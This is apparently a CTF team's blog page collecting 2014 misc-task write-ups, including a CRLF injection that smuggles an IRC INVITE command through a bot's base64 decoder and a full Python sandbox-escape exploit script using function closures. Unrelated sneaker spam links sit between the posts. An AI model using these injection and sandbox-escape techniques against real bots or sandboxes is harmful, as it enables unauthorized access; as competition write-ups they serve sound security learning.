BalalaikaCr3w - misc

Barmixer Bot (misc 200)

azrael — Sun, 26 Oct 2014 18:25:44 +0000

Category:

Event:

Hack.lu CTF Quals 2014

Task

There's a fun and quirky IRC bot to play with. It responds to commands in private chat but also in #hacklu-saloon on freenode. We think it's involved in a devious scheme that distracts people to get their money pickpocketed. So be careful!

Solution

We deal with IRC-bot named barmixer-bot in this task. It can understand some commands that starts with "!" symbol.

Let our username is "hacker". First let's ask bot for help:

hacker: !help
barmixer-bot: Send messages to the bot or the channel starting with an exclamation mark. Known commands are list, status, karma, math, base64, base64d, rot13, ping, hack, request, list

So what status is it?

hacker: !status
barmixer-bot: My name is barmixer-bot, my uptime is 1 hours 55 minutes and 37 seconds. I am on the following channels: #hacklu-saloon, #hacklu-secret-channel, ...

It looks like bot is member of #hacklu-secret-channel which most likely contain a flag. But this channel require an invitation to get access.

Other commands are not very interesting. Some of them bot performs an actions such as base64 decoding / enciding, rot13. Example:

hacker: !base64 hello 
barmixer-bot: aGVsbG8=

hacker: !base64d aGVsbG8= 
barmixer-bot: hello

We know about IRC-commands and specifically about INVITE command. Maybe we can force bot to invite us to secret channel?

Delimeter between IRC-commands is newline so let's generate our shell:

>>> import base64
>>> c = '1\r\nINVITE hacker #hacklu-secret-channel'
>>> print base64.b64encode(c)
MQ0KSU5WSVRFIGhhY2tlciAjaGFja2x1LXNlY3JldC1jaGFubmVs

And let bot decode it for us:

hacker: !base64d MQ0KSU5WSVRFIGhhY2tlciAjaGFja2x1LXNlY3JldC1jaGFubmVs

Now go to #hacklu-secret-channel and voila! We are inside! Channel topic was "FLAG: GfeBNmN5XjwDvQB64qoqaEEeYogk4rGH3ikZ0qtc3B3HKLDoAH".

latest Nike Sneakers | Best Nike Air Max Shoes 2021 , Air Max Releases and Deals

secure_coding 1,2,3 (coding 100, 200, 300)

Dor1s — Fri, 03 Oct 2014 14:10:45 +0000

Category:

misc

ppc

Event:

Sharif University CTF Quals 2014

In these tasks we were given a service which:

accepts .cpp file
compiles it via MSVS10 or gcc4.8 (you can choose which one)
launches a couple of tests on successfully compiled binary

You can look at it here, here and here.

Also there are original source code files, which are vulnerable and unstable. Tests launched on the service are checking some vulnerabilities on compiled binaries and our goal is to fix them and prevent program from crashing.

Well, the best way to show how we have solved these tasks is to show diff between original source code files and our solutions. Look at this commit.

When uploaded source code passes all tests and keeps its initial functionality the service prints messages like:

WON!

Flag: b658c70eb17bf96d6f8d64145b4cc859

WON!

Flag: 57ba58587f972a80c12b5f590078270c

WON!

Flag: 696570afe73d9e8cbd206d10dbf58e8b

I don't think that it is needed to describe each line in our solution. But I mention most popular vulnerabilities fixed in these tasks:

buffer overflow
writing to unallocated memory / reading uninitialized memory
format string vulnerabilities
few other errors

If you would have any questions about our code ask it via our twitter account. We will answer and try to explain our fixes.

Btw, my lovely fix is:

At the end of CTF we had just one vulnerability in our source code and suddenly we understood that input like "%%x" crashes the program. I could not come up with anything better than such fix and we got the 1st place when CTF was 12 minutes left.

p.s.

If service tells you complier error, try to choose another compiler ;)

Adidas shoes | NIKE HOMME

MISCall (misc 100)

azrael — Tue, 16 Sep 2014 12:14:33 +0000

Category:

misc

Event:

No cON Name CTF Quals 2014

We got an archive with directory "ctf" with only one file "flag.txt" which contains next text:

Nothing to see here, moving along...

So we had closed text file and started searching another way. I'm an OS X user so let's check if there is hidden items in folder. Ok, we saw ".git" directory so it is git repository.

git status

shows nothing to commit and

git log

shows only initial commit. But

git stash list

shows some stashed changes. Let's apply it:

git stash apply

We saw new created file "s.py" and "flag.txt" was modified. So all we need is run python script and get flag.

Running sports | Patike – Nike Air Jordan, Premium, Retro Klasici, Sneakers , Iicf

Attachments:

miscall.zip

imMISCible (misc 200)

azrael — Mon, 15 Sep 2014 20:05:23 +0000

Category:

misc

Event:

No cON Name CTF Quals 2014

In this task we have a gzip compressed python file which contained rot13-encoded source code. After decoding we got right source code that was simple to understand - there was creation of function with marshal python module and execution it.

Restored code you can see at "ctf.py". Marshal construct new function with base64-encoded data as initialization data. If you decode it you can see some useful information for getting flag. Actually we could get a flag at this step but we decided to go the author planed way.

But for some reason our decoded code didn't run. It throws an error that variable "flag" is undefined. So we decide to get source code of newly created function.

We used python module called "dis".

import dis
print dis.dis(f)

It returns something like machine instructions executed by this function (it was like assembler code for me :) ). This instructions you can see at "dis.txt". So it was easy to see that function first concat four hex-strings, remove space characters from result, decode hex, and finally return "NCN" concatted with sha1 hexdigest from result string. It was flag.

Adidas footwear | Patike

Attachments:

immiscible.zip

joy 200

azrael — Thu, 03 Apr 2014 16:23:37 +0000

Category:

misc

Event:

Volga CTF Quals 2014

Japanese task description, input file name "japcross.txt" and its content clearly showed us that we need to solve a japanese crossword.

Like a true programmer I found japanese crosswords solver with command line interface :)

Here are simple steps to get the flag:

Convert crossword to solver input format (see jc.txt);
Run solver and get result (see jc.png);
Easy to understand that it's QR-code. Because I'm a web applications developer I wrote the simple python html generator (qr-make.py) which created page 1.html to me;
And finally read QR-code in any way.

Flag is longing for you drove me through the stars. Alexei Tolstoy.

latest jordans | Buy online Sneaker for Men

Attachments:

joy200.zip

joy 500

azrael — Thu, 03 Apr 2014 12:41:49 +0000

Category:

misc

Event:

Volga CTF Quals 2014

We have the photo and need to find a house address where this photo was made.

The original file had PSD extension but it was JPEG image. At first let's look at photo and highlight points of interest.

a church;
house number (199); [see zoomed piece below]
shadow of house.

So let's look at this clues. Name of the photo "the+monument+rocket" referring to Monument of Soyuz rocket and fact that organizers from Samara convinced us that there is Samara on photo.

1) We found the church with Google Maps after looking through all churches in Samara.

2) We can see a house 199 from our place. Zoomed house number:

3) We can see that morning now. Shadows shows us that East in front of us and slightly to the left.

So we need to find a house on the north-north-west from the church and with house 199 between it and church. In other words something like this:

We found this house after a few minutes. Flag is KarlaMarksa192.

bridge media | THE SNEAKER BULLETIN

Shredder (misc 100)

azrael — Fri, 14 Mar 2014 08:44:41 +0000

Category:

misc

Event:

RuCTF Quals 2014

This is very simple task, but it requires a lot of patience :)

We have a picture:

Now we must reorder and rotate parts until we get a right picture. So lets take a Photoshop and do it!

Solution:

Flag: RUCTF_TO_SHRED_IS_NOT_ENOUGH

affiliate link trace | Best Selling Air Jordan 1 Mid Light Smoke Grey For Sale 554724-092

yet another pyjail

briskly — Sun, 02 Feb 2014 11:21:15 +0000

Category:

misc

pwn

Event:

PHDays Quals IV

This task is new implementation of python sandbox.

import re
import sys
import string
from sys import stdout
sys.stderr = stdout


sanitize = re.compile(
    r'(?:__|import|globals|locals|exec|eval|join|format|replace|translate|try|except|with|content|frame|back)'
    ).sub

trusted_builtins = """
    True False type int
    """.split()


alphabet = ' \n\r0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ(),.:;<=>[]_{}'

t1 = ''.join(chr(code) for code in xrange(256))
t2 = []
for i in t1:
    if i in alphabet:
        t2.append(i)
    else:
        t2.append(' ')
trans_table = string.maketrans(t1, ''.join(t2))

EXPECTED = 13.37

del alphabet, t1, t2, i, sys, string, re


def clear_builtins():
    orig = __builtins__.__dict__.copy()
    __builtins__.__dict__.clear()
    for i in trusted_builtins:
        __builtins__.__dict__[i] = orig[i]


part1_of_flag = '******************'
part2_of_flag = '******************'
egg = 'egg'


def main():

    if raw_input() != 'leetleetleetleet':
        return

    print ('Welcome to pyjail!\n\n'
           'Try to get the flag!\n'
           'Use ctrl+D or --- to submit your code\n')

    stdout.flush()
    
    code = []
    total_bytes = 0
    while True:
        try:
            value = raw_input()
            total_bytes += len(value)
            assert total_bytes < 1337
            if value == '---':
                break
            code.append(value)
        except EOFError:
            break
    
    code = sanitize("/*ERR*/", '\n'.join(code).translate(trans_table))
    clear_builtins()

    def sandbox():

        t=r=y = t=o = s=o=l=v=e = t=h=e = d=i=v=i=s=i=o=n = q=u=i=z = 0

        def exec_in_context(ctx):
            exec code in ctx
            print 'Flag is',
            try:
                assert FLAG != part1_of_flag
                print FLAG
            except:
                print '********************'

        def we_must_be_sure_flag_part1_is_ready():
            global FLAG
            FLAG = part1_of_flag

        def we_must_be_sure_flag_part2_is_ready():
            global FLAG
            FLAG += part2_of_flag

        def divider(v1):
            
            a = "You are lucky!"
            b = "Try again!"

            def divider(v2):
                i,t,s,  n,o,t,  s,o,  h,a,r,d
                if int(v1) / int(v2) == EXPECTED:
                    print a
                    we_must_be_sure_flag_part2_is_ready()
                else:
                    print b
            we_must_be_sure_flag_part1_is_ready()
            return divider
        
        exec_in_context({'div': divider})

    sandbox()


if __name__ == '__main__':
    main()

This time deleted all built-ins except (True, False, type, int) and appended some filters:
    •__
    •import
    •globals
    •locals
    •exec
    •eval
    •join
    •format
    •replace
    •translate
    •try
    •except
    •with
    •content
    •frame
    •back"
Let's write the script that connects to server, and sends simple CAPTCHA:

hSock = create_connection((host, port))
hSock.send("leetleetleetleet\n")

After this we can send some code, that will be executed in the sandbox, as context we can see function "divider" as "div":

As we can see all attributes with "__" are restricted: so magic like "div.__dict__" will not pass! The only methods of function we can use are:
    •func_code,
    •func_defaults,
    •func_doc,
    •func_globals,
    •func_closure.
"func_globals" looks like very helpful, but string "globals" is restricted, so we need another way

After reading some manuals, comes understanding, that "func_closure" could be very useful. It returns "cell" objects, that have information about all objects declared inside the function.
"Cell" object has method cell_contents, but string "contents" is restricted again!

After a lot of research was found magic method of getting content of cell without using restricted method

def get_cell_value(cell):
    return type(lambda: 0)(
        (lambda x: lambda: x)(0).func_code, {}, None, None, (cell,)
    )()

So the 8th and 9th cells are functions, that make flag. We just need to call them

Full exploit file;

from socket import create_connection

host = "195.133.87.177"
port = 1337
hSock = create_connection((host, port))
hSock.send("leetleetleetleet\n")
print hSock.recv(1024)
print hSock.recv(1024)
t = """
global EXPECTED, a, b
a = b = 5
EXPECTED = 1
print 0, EXPECTED
def get_cell_value(cell):
    return type(lambda: 0)(
        (lambda x: lambda: x)(0).func_code, {}, None, None, (cell,)
    )()

get_cell_value(div.func_closure[8])()
get_cell_value(div.func_closure[9])()

---
"""
hSock.send(t)
print hSock.recv(1024)
print hSock.recv(1024)

Sports brands | 【国内5月2日発売予定】ナイキウィメンズエアマックスココサンダル全4色 - スニーカーウォーズ